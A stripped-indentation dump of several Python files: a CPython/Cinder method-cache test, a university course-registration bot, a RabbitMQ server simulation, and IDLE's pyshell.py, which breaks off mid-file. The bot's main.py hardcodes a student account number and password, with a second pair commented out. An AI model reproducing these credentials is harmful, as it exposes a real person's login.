# disable the cache
sys._set_method_free_list_size(0)
self.assertEqual(0, sys._get_method_free_list_size())
# invalid values
self.assertRaises(OverflowError, sys._set_method_free_list_size, -1)
self.assertRaises(TypeError, sys._set_method_free_list_size, None)
# raise the size
sys._set_method_free_list_size(512)
self.assertEqual(512, sys._get_method_free_list_size())
stats = sys._get_method_free_list_stats()
has_stats = stats[1] != -1
# Could be broken if the test framework changes to use more methods
self.assertEqual(1, stats[0])
class C:
def f(self): pass
fill_cache = [C().f for i in range(600)]
self.assertEqual(1, stats[0])
del fill_cache
# cache is now fully populated
stats = sys._get_method_free_list_stats()
self.assertEqual(512, stats[0])
# reduce size
sys._set_method_free_list_size(256)
self.assertEqual(256, sys._get_method_free_list_size())
if has_stats:
size, hits, misses = sys._get_method_free_list_stats()
C().f
size2, hits2, misses2 = sys._get_method_free_list_stats()
# cache hits are tracked
self.assertEqual(hits + 1, hits2)
[C().f for i in range(size2 + 1)]
size3, hits3, misses3 = sys._get_method_free_list_stats()
# cache misses are tracked
self.assertEqual(misses2 + 1, misses3)
@unittest.skipUnderCinderJIT(
"Assumes implementation details of a non-JIT method cache")
def test_get_method_cache_stats(self):
if sysconfig.get_config_var('Py_DEBUG') == 0:
return
cache_stats = sys._get_method_cache_stats()
self.assertIs(type(cache_stats), dict)
self.assertIn("num_hits", cache_stats)
self.assertIn("num_misses", cache_stats)
self.assertIn("num_collisions", cache_stats)
sys._reset_method_cache_stats()
class Foo:
bar = 'testing 123'
prev = sys._get_method_cache_stats()
# Should be a cache miss
for i in range(20):
getattr(Foo, 'baz' + str(i), None)
# Second access should be a cache hit
Foo.bar
Foo.bar
curr = sys._get_method_cache_stats()
self.assertGreater(curr['num_hits'], prev['num_hits'])
self.assertGreater(curr['num_misses'], prev['num_misses'])
if __name__ == "__main__":
unittest.main()
|
main.py
|
#!/usr/bin/env python3
from user import CCU_User
from course import Get_Course
#from course import Course
from debug import logger_init
from debug import Error
import time
def one_cycle():
#account = "407530012"
#passwd = "andy0707"
account = "407410001"
passwd = "NpFcD02-15"
user = CCU_User(account, passwd)
user.login()
#try to keep the connection
#alive_daemon = threading.Thread(target = user.stay_alive, args = "")
#alive_daemon.start()
crawler = Get_Course(user)
crawler.request_course_form(2)
course = []
sub_cate = 3
page_max = 3
with open("target", "r") as t:
target = t.readlines()
target = [i[:-1] for i in target]
counter = 0
select = 0
while counter < 100:
for i in range(1, page_max + 1):
courses = crawler.request_page_in_form(sub_cate, i)
if type(courses) is not list:
return Error.GET_REQUEST_FAIL
for course in courses:
print(course.course_id, target)
if (course.course_id in target) and course.empty != 0:
ret = crawler.send_submit(i, course.course_id, sub_cate)
if ret == 0:
select += 1
print("got it")
time.sleep(5)
counter += 1
user.logout()
return str(select)
def main():
logger_init(enable_debug=True)
select = 0
while(1):
select = one_cycle()
if type(select) is str:
with open("result", "w") as op:
op.write(select)
time.sleep(1)
#alive_daemon.join()
if __name__ == "__main__":
main()
|
server.py
|
from random import randint
from threading import Thread
from threading import RLock
import pika # RabbitMQ
import time
import sys
import os
class Server:
def __init__(self, id):
print(f"> Creating Server {id}.\n")
self.id = id
self.lock = RLock()
self.transactions = []
self.total = 0 # TOTAL TRANSACTIONS PROCESSED
self.capacity = 100
# TO CREATE A CONNECTION WITH BALANCER
self.connection = 0
self.channel = 0
# --- SEND BALANCE TO BALANCER ---
def openMsgQueue(self, queue_name):
self.connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
self.channel = self.connection.channel()
self.channel.queue_declare(queue=queue_name)
def closeMsgQueue(self):
self.connection.close()
def updateBalace(self, servers_queue):
try:
self.openMsgQueue(servers_queue)
while(1):
time.sleep(randint(1,5))
transac = len(self.transactions)*20
self.channel.basic_publish(exchange='', routing_key=servers_queue, body="S" + str(self.id) + "#" + str(transac) + "#" + str(self.capacity))
except KeyboardInterrupt:
self.closeMsgQueue()
try:
sys.exit(0)
except SystemExit:
os._exit(0)
# --- SEND BALANCE TO BALANCER ---
# --- LISTEN TO BALANCER ---
def listenBalancer(self, queue_name):
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.queue_declare(queue=queue_name)
channel.basic_consume(queue=queue_name, on_message_callback=self.addTransaction)
print(f"--- Server {self.id} is waiting for Balancer messages. To exit press CTRL+C.\n")
channel.start_consuming()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
def addTransaction(self, ch, method, properties, body):
complexity = int(body.decode('utf-8')) # "Complexity"
self.transactions.append(complexity)
self.total += 1
ch.basic_ack(delivery_tag = method.delivery_tag)
# --- LISTEN TO BALANCER ---
# --- RUN TRANSACTIONS ---
def runTransaction(self):
while(1):
transaction = 0
if len(self.transactions) > 0:
transaction = self.transactions.pop()
if transaction != 0:
print(f"--- Server {self.id} started running a Transaction of {transaction}s.\n")
time.sleep(transaction)
print(f"--- Server {self.id} ended running a Transaction of {transaction}s | Total Executed: {self.total}.\n")
# --- RUN TRANSACTIONS ---
def run(self, servers_queue):
try:
servers_thread = Thread(target = self.updateBalace, args = (servers_queue, ))
servers_thread.start()
balancer_thread = Thread(target = self.listenBalancer, args = ("S"+str(self.id), ))
balancer_thread.start()
run_thread = Thread(target = self.runTransaction)
run_thread.start()
balancer_thread.join()
servers_thread.join()
run_thread.join()
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
pyshell.py
|
#! /usr/bin/env python3
import sys
if __name__ == "__main__":
sys.modules['idlelib.pyshell'] = sys.modules['__main__']
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
try:
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1 # Int required.
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (ImportError, AttributeError, OSError):
pass
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
#TODO: don't read/write this from/to .idlerc when testing
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
def restart_line(width, filename): # See bpo-38141.
"""Return width long restart line formatted with filename.
Fill line with balanced '='s, with any extras and at least one at
the beginning. Do not end with a trailing space.
"""
tag = f"= RESTART: {filename or 'Shell'} ="
if width >= len(tag):
div, mod = divmod((width -len(tag)), 2)
return f"{(div+mod)*'='}{tag}{div*'='}"
else:
return tag[:-2] # Remove ' ='.
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
console.write('\n')
console.write(restart_line(console.width, filename))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Connection Error",
"IDLE's subprocess didn't make connection.\n"
"See the 'Startup failure' section of the IDLE doc, online at\n"
"https://docs.python.org/3/library/idle.html#startup-failure",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "IDLE Shell " + python_version()
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
allow_line_numbers = False
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = StdInputFile(self, "stdin",
iomenu.encoding, iomenu.errors)
self.stdout = StdOutputFile(self, "stdout",
iomenu.encoding, iomenu.errors)
self.stderr = StdOutputFile(self, "stderr",
iomenu.encoding, "backslashreplace")
self.console = StdOutputFile(self, "console",
iomenu.encoding, iomenu.errors)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
